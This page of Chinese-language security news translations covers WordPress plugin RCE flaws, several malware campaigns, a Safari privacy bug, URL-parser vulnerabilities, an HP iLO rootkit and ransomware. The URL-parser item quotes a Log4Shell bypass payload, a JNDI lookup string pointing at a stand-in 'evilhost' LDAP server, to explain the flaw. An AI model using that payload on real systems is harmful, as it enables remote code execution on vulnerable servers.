Zoe

o(* ̄▽ ̄*)ブ

PHP Everywhere 出现 RCE 漏洞,WordPress 站点受影响

Hackernews 编译,转载请注明出处: 一个名为 PHP Everywhere 的 WordPress 插件中披露了一个关键的安全漏洞,这个插件在全世界有超过30,000个网站使用,攻击者可能会利用这个漏洞在受影响的系统上执行任意代码。 PHP Everywhere 用于在 WordPress 安装过程中打开 PHP 代码的开关,使用户能够在内容管理系统的 Pages、 Posts 和 Sidebar 中插入和执行基于 PHP 的代码。 以下这三个问题,在 CVSS 评级系统中评级9.9(满分为10),影响版本2.0.3及之后的版本,如下: CVE-2022-24663-订阅者 + 用户通过短代码远程执行代码 CVE-2022-24664-Contributor + 用户通过 metabox 远程执行代码,以及 CVE-2022-24665-Contributor + 用户通过gutenberg块远程执行代码 成功利用这三个漏洞可能导致恶意 PHP 代码的执行,这些代码可以被用来实现完全的站点接管。 安全公司 WordPress 表示,他们在1月4日向插件作者 Alexander Fuchs 披露了这个漏洞,随后在2022年1月12日发布了3.0版本的更新,完全删除了漏洞代码。 “这个插件的3.0.0版本的更新是一个突破性的变化,它删除了[php_everywhere]的短代码和小部件,”插件的更新描述页面写道。“从插件设置页面运行升级向导,将旧代码迁移到Gutenberg块。” 值得注意的是,3.0.0版本只通过Block editor编辑器支持 PHP 代码片段,因此仍然依赖 Classic Editor的用户必须卸载该插件,并下载一个替代解决方案来托管自定义 PHP 代码。 消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

PrivateLoader: 众多恶意软件方案的第一步

长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量和地理定位的恶意软件感染。 通过了解这些服务是如何扩散的,防御者可以更好地识别这些活动,并阻止它们对组织的 IT 堆栈造成严重破坏。本报告重点介绍了 PrivateLoader 模块化下载程序,该下载程序由 C++程式语言编写,连接到一个未经确认的 PPI 服务。PrivateLoader 位于此操作的前端,并与其后端基础设施通信,以检索 url,从而将恶意有效负载“安装”到受感染的主机上。正如与 PPI 服务绑定的下载一样,PrivateLoader 传送了各种数据,比如哪些有效载荷被下载并成功启动。 分发活动通常依靠搜索引擎优化(SEO)增强的网站网络,吸引毫无防备的搜索盗版软件的受害者下载并执行恶意软件。它通常会发送一个密码保护的存档,其中包含一个安装文件,该文件在受感染的主机上嵌入并执行多个恶意有效负载,如GCleaner、PrivateLoader、Raccoon、Redline、Smokeloader和Vidar恶意软件。我们估计,这些攻击活动从2021年5月起开始纳入PrivateLoader。 本报告调查了其背后的 PPI 服务和运营商使用的获取“安装”的方法,并提供了服务提供的恶意软件组的详细信息。     更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1829/ 消息来源:intel471,封面来自网络,译者:Zoeppo。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

巴勒斯坦黑客在近期攻击中植入新的 NimbleMamba

Hackernews 编译,转载请注明出处: 一个APT攻击黑客组织可能与巴勒斯坦结盟,不怀好意,利用以前没有记录的名为NimbleMamba的植入物,已经开始了一项新的攻击。 企业安全公司 Proofpoint 在一份报告中说,这些入侵利用了一个复杂的攻击链,目标是中东政府、外交政策智囊团和一家国有航空公司。该报告将隐蔽攻击归咎于一个名为 Molerats (又名 TA402)的威胁攻击者。  该APT 组织不断更新他们的恶意软件植入和传播方式,因而臭名昭著。最近它似乎与针对巴勒斯坦和土耳其的人权活动家和记者的间谍攻击有一定联系,在2021年6月曝光的一次攻击中部署了一个叫做  LastConn的后门。 攻击并未停止,背后的攻击者们积极重组武器库,开发了NimbleMamba,这个产品被设计用来取代 LastConn,而LastConn被认为是另一个叫做SharpStage的后门的升级版本,该组织在2020年12月的攻击中使用了这个后门。 “ NimbleMamba 使用护栏来确保所有被感染的受害者都在TA402的目标区域内,”研究人员说,并补充道,这个恶意软件“使用 Dropbox API 来进行命令和控制以及渗透”,表明它被用于“高度针对性的情报收集活动” 另外还使用了一个名为 BrittleBush 的木马,它与远程服务器建立通信,检索 base64编码的命令,以便在受感染的机器上执行。此外,据说这些袭击与上述针对巴勒斯坦和土耳其的恶意活动是同时发生的。 感染序列反映了攻击者用来破坏其目标用了完全相同的技术。鱼叉式网络钓鱼邮件是起点,包含地理链接,指向恶意软件的有效载荷,但只有在收件人在目标区域之一的情况下才可行。如果目标位于攻击半径之外,链接会将用户重定向到一个良性的新闻网站,比如 Emarat Al Youm。 然而,最近在2021年12月和2022年1月的攻击中,攻击者使用了 Dropbox 的网址和攻击者控制的 WordPress 网站来传输包含 NimbleMamba 和 BrittleBush 的恶意 RAR 文件。 这一进展是对手使用云服务(如 Dropbox)发动攻击的最新例证,更不用说那些狡猾的攻击者能够多迅速地对公开披露的入侵方法做出反应,从而创造出一些强有力的、有效的方法,可以突破安全和检测层。 研究人员总结说: “ ta402仍然是一个效率高的攻击者,它通过针对中东的高度有针对性的行动表明了自己的持久性。”“(这两次)攻击表明,Molerats仍然有能力根据情报目标修改攻击链。” 消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

漫游螳螂恶意软件危及欧洲

漫游螳螂(Roaming Mantis)是一种恶意攻击,目标是 Android 设备,通过钓鱼短信散播移动恶意软件。我们发现了漫游螳螂在2021年的一些新活动,以及 Android 木马 Wroba.g (或Wroba.o,又名 Moqhao,XLoader)的一些变化,这些变化主要用于本次攻击活动。此外,我们发现除了日本、台湾和韩国外,法国和德国也是“漫游螳螂”的主要目标。 我们对“漫游螳螂”的最新研究表明,攻击者正专注于通过向欧洲用户发送钓鱼短信来扩大感染范围。法国和德国的攻击非常活跃,引起了德国警方和法国媒体的注意。他们提醒用户注意钓鱼信息和受到攻击的作为登陆页面的网站。     更多内容请至Seebug Paper  阅读全文:https://paper.seebug.org/1827/ 消息来源:Kaspersky,封面来自网络,译者:Zoeppo。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

苹果 Safari 浏览器漏洞允许跨站点用户跟踪

Hackernews 编译,转载请注明出处: 在苹果 Safari 15的 IndexedDB API 实现中放入的一个软件漏洞可能被恶意网站利用,以追踪用户在网络浏览器中的在线活动,更糟糕的是,它还可能泄露用户的身份。 2021年11月28日,防欺诈保护软件公司 FingerprintJS 向 iPhone 制造商报告了这一漏洞。 IndexedDB 是 web 浏览器提供的一个低级 JavaScript 应用程序编程接口(API) ,用于管理结构化数据对象(如文件和 blob)的 NoSQL 数据库。 “像大多数 web 存储解决方案一样,IndexedDB 遵循同源策略,”Mozilla 在其 API 文档中指出。”因此,尽管您可以访问域内存储的数据,但不能访问跨不同域的数据。” 同源是一种基本的安全机制,它确保从不同的来源(即方案(协议)、主机(域)和 URL 的端口号等)检索到的资源彼此隔离。这实际上意味着“ http [ : ]/example [ . ]Com/”和“ https [ : ]//example [ . ]Com/”并不是同一个来源,因为它们使用不同的方案。 通过限制从一个来源加载的脚本与另一个来源的资源进行交互的方式,用于隔离潜在的恶意脚本,通过预防流氓网站运行任意的 JavaScript 代码来读取来自另一个域的数据(比如电子邮件服务),来减少潜在的攻击载体。 但是 Safari 在 iOS、 iPadOS 和 macOS 中处理 IndexedDB API 的情况并非如此。 “在 macOS 上的 Safari 15,以及 iOS 和 iPadOS 15上的所有浏览器中,IndexedDB API 都违反了同源政策,”Martin Bajanik 在一份报告中写道。每当网站与数据库交互时,在同一浏览器会话中的所有其他活动框架、标签和窗口中都会创建一个具有相同名称的新(空)数据库 这种侵犯隐私的后果是,它允许网站知晓了用户在不同的选项卡或窗口中访问的其他网站,更不用说准确识别像 YouTube 和 Google Calendar 这样的谷歌服务上的用户,因为这些网站创建了 IndexedDB 数据库,其中包括经过验证的谷歌用户 id,这是一个识别单个谷歌账户的内部标识符。 “这不仅意味着不受信任或恶意的网站可以知道用户的身份,而且还可以知道同一用户使用的多个独立账户,”Bajanik 说。 更糟糕的是,如果用户在浏览器窗口的同一个标签内访问多个不同的网站,这种泄漏还会影响 Safari 15的隐私浏览模式。我们已经联系了苹果公司,希望得到进一步的评论,如果得到回复,我们将更新相关报道。 “这是一个巨大的漏洞,”谷歌 Chrome 开发者杰克 · 阿奇博尔德在推特上写道。”在 OSX 上,Safari 用户可以(暂时)切换到另一个浏览器,以避免其数据跨源泄漏。iOS 用户没有这样的选择,因为苹果(Apple)禁止其它浏览器引擎。” 消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

研究人员在十几个广泛使用的 URL 解析器库中发现了 bug

 Hackernews 编译,转载请注明出处: 研究员在对16种不同的URL解析库进行研究时发现了不一致和混淆,这可能被用来绕过验证,并且易受到黑客的攻击。 在一项由网络安全公司 Claroty 和 Synk 联合进行的深入分析中,他们在许多第三方库中发现八个安全漏洞,这些漏洞是用 C、 JavaScript、 PHP、 Python 和 Ruby 语言编写的,并被多个 web 应用程序使用。 研究人员在与 The Hacker News 共享的一份报告中表示: “ URL 解析中的混乱可能会导致软件中出现意想不到的情况(比如 web 应用程序) ,并可能被攻击者利用来导致拒绝服务情况、信息泄露,或者可能造成远程代码执行攻击。” 由于 URL 是一种基本机制,可以请求和检索位于本地或网络上的资源,解析库阐释 URL 请求的差异可能会给用户带来重大风险。 一个典型的例子是上个月在无处不在的 Log4j 日志框架中披露的 Log4Shell 漏洞,这个缺陷的原理是这样的,即当一个易受攻击的应用程序对一个恶意攻击者控制的字符串进行日志记录时,该字符串会导致一个 JNDI 查找,该字符串连接到一个攻击者操作的服务器,并执行任意的 Java 代码。 尽管美国 Apache软件基金会安全局(ASF)很快提出了一个修复方案来解决这个问题,但是很快就发现通过”${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” 格式的特制输入可以绕过这个方案,再次允许远程 JNDI 查找实现代码执行。 “这种绕过原理是这样的,即两个不同的(!)URL 解析器在 JNDI 查找过程中被使用了 ,一个解析器用于验证 URL,另一个解析器用于获取 URL,并且根据每个解析器如何处理 URL 的片段部分(#) ,权限也会发生变化,”研究人员说。 具体来说,如果输入被视为一个常规的 HTTP URL,Authority 组件(域名和端口号的组合)将在遇到片段标识符时结束,而如果将其视为一个 LDAP URL,解析器将分配整个”127.0.0[.]1#.evilhost.com:1389″作为权限,因为 LDP URL 规范没有说明片段。 实际上,能够发现这八个漏洞有两个主要原因,使用多个解析器是其一,另一个原因是当库遵循不同的 URL 规范时出现不一致问题时,实际上引入了一个可利用的漏洞。 混淆中不协调的URL包含反斜杠(“\”),不规则的斜杠数量(例如, https:///www.example[.]com)或者 URL 编码数据(“%”),有的URL缺少 URL 方案,这可能被用来获得远程代码执行,甚至出现拒绝服务(DoS)和开放重定向钓鱼攻击。 发现的8个漏洞列表如下,所有这些漏洞都已经由各自的维护者解决了 Belledonne’s SIP Stack (C, CVE-2021-33056) Video.js (JavaScript, CVE-2021-23414) Nagios XI (PHP, CVE-2021-37352) Flask-security (Python, CVE-2021-23385) Flask-security-too (Python, CVE-2021-32618) Flask-unchained (Python, CVE-2021-23393) Flask-User (Python, CVE-2021-23401) Clearance (Ruby, CVE-2021-23435) “许多现实生活中的攻击场景可能来自不同的解析原语,”研究人员说。为了保护应用程序不受 URL 解析漏洞的影响,“有必要充分了解是什么解析器参与了整个过程,解析器之间的区别,它们如何解释不同的错误 URL,以及它们支持什么类型的 URL。”  消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

新型 iLoBleed Rootkit 攻击 HP 企业服务器,并携带数据擦除功能

Hackernews 编译,转载请注明出处:   我们发现一个以前未知的rootkit,它瞄准了惠普企业的Integrated Lights Out(iLO)服务器管理技术,并进行攻击,篡改固件模块并彻底清除受感染系统中的数据。 伊朗网络安全公司Amnpardaz本周记录了这一发现,这是iLO固件中第一个真实恶意软件的实例。 “iLO有许多特点使其成为恶意软件和APT组织的理想乌托邦:极高的权限(高于操作系统中的任何访问级别);对硬件的访问级别非常低;管理员和安全工具难以检测检测;大众普遍缺乏检查和/或保护iLO的知识和工具,即使在更改操作系统后,恶意软件仍能持久存在,更强的是,它能始终运行且不关闭,”研究人员说。 除了管理服务器外,iLO模块还可以广泛访问服务器上安装的所有固件、硬件、软件和操作系统(OS),这一事实使它们成为破坏 HP服务器的组织的理想选择,同时也使恶意软件能够在重新启动后保持持久性并在重新安装操作系统后存活。然而,用于渗透网络基础设施和部署数据清洁器的确切操作方式仍然未知。   名为iLOBleed的rootkit自2020年开始用于攻击,其目标是操纵大量原始固件模块,以秘密阻止固件更新。具体地说,对固件例程所做的修改仿造了固件升级过程——据称显示了正确的固件版本并添加了相关日志——而实际上没有执行更新。 研究人员说:“仅此一点就表明,这种恶意软件的目的是成为一个具有最大隐秘性的rootkit,并躲避所有安全检查。”“通过隐藏在最强大的处理资源之一(始终处于运行状态)中,能够执行攻击者发送的任何命令,而不会被检测到。”   尽管敌手身份不明,但Amnpardaz将该rootkit描述为可能是高级持续威胁(APT)的手笔,APT是一个民族国家或国家赞助的团体,使用连续、秘密,以及复杂的黑客技术,以获得对系统的未经授权的访问,并在设备内部长时间停留而不引起注意。 如果有什么不同的话,黑客技术的进步再次将固件安全性纳入了关注的焦点,这就需要及时应用制造商提供的固件更新以降低潜在风险,将iLO网络与操作网络分开,并定期监控固件是否存在感染迹象。 研究人员指出:“另一个重要的问题是,有一些方法可以通过网络和主机操作系统访问和感染iLO。”“这意味着,即使iLO网络电缆完全断开,仍有可能感染恶意软件。有趣的是,就算不使用iLO,也无法完全关闭或禁用iLO。”   消息来源:TheHackerNews,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

eCh0raix 勒索软件攻击激增,QNAP NAS 设备受到攻击

Hackernews 编译,转载请注明出处: QNAP网络连接存储(NAS)设备的用户报告了eCh0raix勒索软件(也称为QNAPCrypt)对其系统的攻击。 这一特定恶意软件背后的攻击者在圣诞节前一周左右加强了攻击力度,用管理员权限控制设备。 圣诞节前攻击次数增加 BleepingComputer 论坛用管理QNAP和Synology NAS系统的用户定期报告eCh0raix勒索软件攻击,但是在12月20日左右,才有众多用户开始披露事件。 ID勒索软件服务记录了攻击数量的激增,提交的申请在12月19日开始增加,到12月26日逐渐减少。   目前尚不清楚最初的感染媒介。一些用户说他们行事鲁莽,没有好好保护设备(例如,通过不安全的连接将其暴露在互联网上);其他人则声称QNAP照片站中存在一个漏洞,使得攻击者有机可乘。 是的,我知道我是一个彻底的白痴,因为我把设备暴露给了这种类型的黑客,但我并没有认真对待这些。我一直以为没人想要攻击它,我要立马说我错了! 无论攻击路径如何,eCh0raix勒索软件攻击者似乎在管理员组中创建了一个用户,这使他们能够加密NAS系统上的所有文件。 QNAP用户(其中一些用户出于业务目的使用NAS设备)在 BleepingComputer论坛说该恶意软件对图片和文档进行了加密。 除了攻击次数激增外,这场攻击中最突出的是,攻击者错误地输入了赎金通知的扩展,并使用了“.TXTT”扩展。     虽然这并不妨碍查看说明,它可能会给一些用户带来问题,用户必须用特定的程序(如记事本)指示操作系统打开文件或将其加载到上述程序中。 BleepingComputer发现,在最近的攻击中,ech0raix勒索软件的要求从0.024比特币(1200美元)到0.06比特币(3000美元)不等。有些用户别无他选,不得不付钱给黑客来恢复他们的文件。   需要注意的是,有一个免费的解密器,用于应对旧版本(2019年7月17日之前)的eCh0raix勒索软件。然而,没有免费的解决方案来解密被最新版本的恶意软件(版本1.0.5和1.0.6)锁定的数据。 使用eCh0raix/QNAPCrypt的攻击始于2019年6月,此后一直持续威胁用户。今年早些时候,QNAP提醒用户注意另一波针对带有弱密码设备的eCh0raix攻击。 用户应该遵循QNAP的建议,以确保对其NAS设备和存储的数据进行适当的保护。   消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

个人隐私保护搜索引擎 DuckDuckGo 更受青睐

Hackernews 编译,转载请注明出处: 注重隐私的搜索引擎 DuckDuckGo 增长迅速,该公司平均每天搜索查询超过1亿个,在2021年间增长了近47%。 与其他搜索引擎不同,DuckDuckGo说他们不会跟踪你在其他网站上的搜索或行为。DuckDuckGo搜索页面构建的用户配置文件不是用于显示个性化广告,它显示的广告是基于搜索的关键字。 这意味着,如果您在DuckDuckGo上搜索电视,该搜索查询将不会用在您访问的每个其他网站上。 此外,为了建立他们的搜索索引,搜索引擎使用DuckDuckBot蜘蛛来抓取网站并从合作伙伴(如维基百科和Bing)接收数据。然而,他们并不使用谷歌的数据建立索引。 DuckDuckGo显示出快速增长 虽然谷歌仍然是主要的搜索平台,但DuckDuckGo的年增长率依然令人印象深刻。 2020年,DuckDuckGo 共收到236亿条搜索查询,截至12月底,每天平均收到7900万条搜索查询。 在2021,DuckDuckGo收到346亿个总搜索查询(截至目前),平均每天有1亿个搜索查询,显示了46.4%的增长。 虽然DuckDuckGo的增长相当可观,但它仍然只占总市场份额的2.53%,雅虎占3.3%,必应占6.43%,谷歌占美国搜索引擎流量的87.33%。 然而,随着人们不断地对谷歌、Facebook、微软和苹果等科技巨头使用用户数据的方式感到失望,我们可能会看到更多的人转向关注隐私的搜索引擎。 为了进一步帮助用户保护他们的隐私,DukDukGo发布了一个电子邮件转发服务,在2021被称为“电子邮件保护”,它没有电子邮件跟踪器,并允许用户保护其真实的电子邮件地址。 他们还推出了“Android应用程序跟踪保护”,阻止在应用程序中来自谷歌和Facebook的第三方跟踪程序。 最近,DuckDuckGo宣布他们将发布一款DuckDuckGo桌面隐私浏览器,该浏览器将不基于Chromium,而是从头开始构建。 “没有复杂的设置,没有误导性的警告,没有隐私保护“级别”——只有强大的隐私保护,在默认情况下,可以跨搜索、浏览、电子邮件等进行保护,”最近一篇关于DuckDuckGo的博文说道。 “它不是一个“隐私浏览器”;它是一个尊重您隐私的日常浏览应用程序,因为现在是阻止公司监视您的搜索和浏览历史的最佳时机。” 对于那些希望拿回数据控制权并为搜索行为增加更多隐私的人来说,DuckDuckGo可能是最适合搜索引擎。   消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文

恶意软件 Blister 秘密潜入 Windows 系统

Hackernews 编译,转载请注明出处: 安全研究人员发现了一个恶意攻击活动,该攻击活动借助有效的代码签名证书将恶意代码伪装成合法的可执行文件。 研究人员称之为Blister的有效载荷,充当其他恶意软件的加载程序,它似乎是一种新的威胁,具有较低的检测率。 Blister背后的攻击者一直依赖多种技术来监视他们的攻击,使用代码签名证书只是他们的伎俩之一。 签名、盖章、交付 Elastic搜索公司的安全研究人员发现,自9月15日以来,无论是谁幕后操纵着Blister恶意软件,都至少已经开展了三个月的活动。 攻击者使用了8月23日起有效的代码签名证书。它是由数字身份提供商Sectigo为一家名为Blist LLC的公司发行的,其电子邮件地址来自一家俄罗斯提供商Mail.Ru。 使用有效证书对恶意软件进行签名是攻击者多年前就会的老把戏。当时,他们常常从合法公司窃取证书。如今,攻击者要求使用他们所感染的公司或前线业务的详细信息获得有效的证书。 在本周的一篇博客文章中,Elastic表示,他们负责地向Sectigo报告了被滥用的证书,以便Sectigo可以撤销该证书。 研究人员说,攻击者依靠多种技术使攻击不被发现。一种方法是将Blister恶意软件嵌入合法库(例如colorui.dll)。 然后通过rundll32命令,用提升后的权限执行恶意软件。使用有效的证书进行签名并使用管理员权限进行部署会使安全解决方案失效。 Elastic研究人员说,在下一步中,Blister将从资源部分解码“严重模糊”的引导代码。十分钟里,代码处于休眠状态,可能是为了躲避沙箱分析。 然后,它通过解密提供远程访问并允许横向移动的嵌入式有效载荷Cobalt Strike和BitRAT开始行动,这两种载荷过去曾被多个攻击者使用。 该恶意软件通过ProgramData文件夹中的一个副本和另一个伪造的rundll32.exe实现持久性。它还被添加到启动位置,因此它在每次启动时都会作为explorer.exe的子项启动。 Elastic的研究人员发现了Blister加载器的签名版本和未签名版本,在VirusTotal扫描服务上,这两个版本的防病毒引擎的检测率都很低。 虽然这些初始感染媒介的攻击的目标尚不清楚,但通过结合有效的代码签名证书、嵌入合法库中的恶意软件以及在内存中执行的有效负载,攻击者成功攻击的机会增加了。 Elastic创建了一个Yara规则,用于识别Blister活动,并提供IOC,以帮助组织抵御威胁。     消息来源:BleepingComputer,译者:Zoeppo; 本文由 HackerNews.cc 翻译整理,封面来源于网络; 转载请注明“转自 HackerNews.cc ” 并附上原文